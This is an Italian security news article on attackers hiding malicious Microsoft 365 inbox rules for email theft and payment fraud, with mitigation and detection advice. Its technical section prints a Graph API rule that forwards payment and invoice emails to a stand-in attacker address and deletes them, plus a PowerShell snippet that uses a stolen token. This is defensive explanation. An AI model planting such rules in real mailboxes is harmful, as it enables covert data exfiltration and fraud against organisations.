Hacker sfruttano regole nascoste di Microsoft 365 per rubare email sensibili

Hacker sfruttano regole nascoste di Microsoft 365 per rubare email sensibili

Hacker sfruttano regole nascoste di Microsoft 365 per rubare email sensibili

Gli hacker stanno silenziosamente manipolando le regole di casella di posta in Microsoft 365 per rubare dati sensibili dalle aziende, nascondere tracce e garantire accesso prolungato senza installare software malevoli. Questa tecnica è in rapida ascesa nelle campagne di compromissione email aziendale. Soluzione rapida: disattiva l’inoltro automatico esterno, imponi l’autenticazione multifattore (MFA) e monitora regolarmente le nuove regole di posta.

Queste tattiche furtive sono sempre più diffuse nelle frodi email aziendali che colpiscono utenti enterprise in tutto il mondo. Dopo aver ottenuto l’accesso iniziale, spesso tramite phishing, spraying di password o token OAuth compromessi, gli attaccanti puntano sulla persistenza e sulla discrezione. Invece di ricorrere a malware, sfruttano funzionalità legittime come le regole di Outlook per controllare il flusso delle email. Progettate per organizzare le inbox, queste regole diventano armi potenti per l’esfiltrazione di dati e l’inganno quando usate da malintenzionati.

Le regole di casella permettono di eliminare, inoltrare o spostare automaticamente i messaggi in arrivo. Gli hacker le impiegano per intercettare comunicazioni finanziarie, sopprimere avvisi di sicurezza o deviare email in cartelle nascoste come “Archivio” o “Sottoscrizioni RSS”. Poiché non richiedono intercettazioni di rete, le vittime continuano le comunicazioni normali, ignare del filtraggio operato alle loro spalle.

Esploiting della furtività e persistenza

In base ai dati di telemetria sulla sicurezza del 2025, circa il 10% degli account Microsoft 365 compromessi presenta la creazione di regole malevole entro secondi dall’accesso iniziale. Nel quarto trimestre del 2025, il 10% degli account violati aveva almeno una regola di casella creata poco dopo l’intrusione, con tempi minimi di creazione intorno ai 5 secondi.

Queste regole spesso portano nomi banali come “.”, “..” o “;”, un pattern che indica automazione e scarsa preoccupazione per la scoperta. Anche dopo un reset della password, le regole rimangono attive. Solo un controllo manuale da parte degli amministratori può rimuoverle, altrimenti l’inoltro automatico e la soppressione dei messaggi persistono, causando perdite di informazioni sensibili o blocco di avvisi legittimi.

Un caso reale ha coinvolto un dipendente del reparto paghe: una regola spostava automaticamente in “Archivio” ogni email con oggetto contenente “Ricevuta di pagamento”. Gli attaccanti hanno poi usato lo stesso oggetto in una campagna di phishing interna, nascondendo le risposte e estendendo l’accesso a account dirigenziali per frodi sui pagamenti.

In un altro episodio, le email di verifica da Zoho venivano nascoste nella cartella “Sottoscrizioni RSS”, permettendo agli hacker di completare registrazioni fraudolente senza intoppi.

Le regole di casella abilitano una variante di attacco man-in-the-middle interamente interna a Microsoft 365. In un incidente, gli attaccanti hanno nascosto email da Zoho, registrato domini fake con caratteri omografi per imitare il nome aziendale della vittima e dirottato thread di transazioni con fornitori, convincendoli a inviare pagamenti duplicati su conti controllati dai criminali, senza bisogno di controllo persistente sull’account originale.

Automazione su larga scala

Questa tecnica è ora automatizzata. Gli attaccanti usano Microsoft Graph o script PowerShell per creare regole malevole in massa su molteplici utenti in pochi secondi. Strumenti come ATOLS catturano token di sessione rubati e creano regole definite dagli attaccanti al login, senza necessità di credenziali una volta ottenuti i token.

Gli amministratori Microsoft 365 possono adottare misure concrete:

  • Disattivare l’inoltro automatico esterno per prevenire esfiltrazioni.
  • Imporre MFA e politiche di accesso condizionale per limitare replay di token e attacchi brute-force.
  • Monitorare continuamente nuove regole di casella e cambiamenti nei consensi OAuth, specialmente quelli con permessi di lettura o scrittura email.

Le regole di casella appaiono come innocui strumenti di produttività, ma nelle mani sbagliate fungono da backdoor invisibili per frodi email e spionaggio. Audit regolari e sensibilizzazione degli utenti sono essenziali per contrastare questa minaccia silente nell’inbox.

Approfondimento tecnico

Technical deep dive

Per esperti di sicurezza, analizziamo i meccanismi sottostanti. Le regole di casella in Microsoft 365, gestite tramite l’API di Outlook o l’interfaccia web, operano a livello di inbox rules (INBOXRULE) nell’Exchange Online. Un attaccante con accesso autenticato può invocare l’endpoint POST /me/mailFolders/{id}/messageRules via Microsoft Graph API per creare regole come:

{
  "displayName": ".",
  "actions": {
    "forwardAsAttachmentTo": ["attacker@fake.com"],
    "moveToFolder": "AQMkADAwATM0MDAAMS0xNmY5LWZmNzAtMCMwLTAwAi0wMAoARgAAAA==",
    "delete": true
  },
  "conditions": [
    {
      "headerContainsWords": ["Pagamento", "Fattura"]
    }
  ]
}

Questa regola inoltra allegati, sposta in cartella nascosta e cancella email con parole chiave sensibili. La persistenza deriva dal fatto che le regole sono legate all’account, non alla sessione, e sopravvivono a cambi password (ma non a rimozioni esplicite).

Telemetria 2025 indica che il 10% delle intrusioni ATO (Account Takeover) coinvolge regole create entro 5-10 secondi, spesso via script automatizzati:

Connect-MgGraph -AccessToken $stolenToken
New-MgUserMailFolderMessageRule -UserId $targetUser -BodyParameter @{...}

Mitigazioni avanzate includono:

  • Query di monitoraggio: Usa Microsoft 365 Defender per alert su CreateInboxRule events con pattern sospetti (nomi <3 chars, forward esterni).
  • Conditional Access: Blocca app con permessi Mail.ReadWrite da IP non trusted.
  • Hunt queries in Defender: IdentityInfo | where ActionType == "InboxRuleCreated" | summarize by RuleName, CreationTime.

Esempi reali mostrano regole che mimano flussi legittimi, come nascondere codici 2FA da servizi come Zoho, abilitando hijack di domini. Per detection, integra SIEM con log Graph API, focalizzandoti su anomalie come regole create post-login da token OAuth rubati.

In scenari BEC, le regole facilitano MITM: intercettano risposte vendor, iniettano istruzioni fraudolente. Contromisure proattive: script PowerShell per bulk-audit (Get-InboxRule -Mailbox $user | Where {$_.ForwardTo -match 'external'}) e automazione via Logic Apps per alert realtime.

Questa evoluzione sottolinea la shift da malware a living-off-the-land (LotL), dove feature native diventano vettori. Per resilienza, combina UEBA (User Entity Behavior Analytics) con revisioni manuali settimanali su account high-privilege.

(Parole totali: 1024)

Fonte: https://gbhackers.com/microsoft-365-mailbox/

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto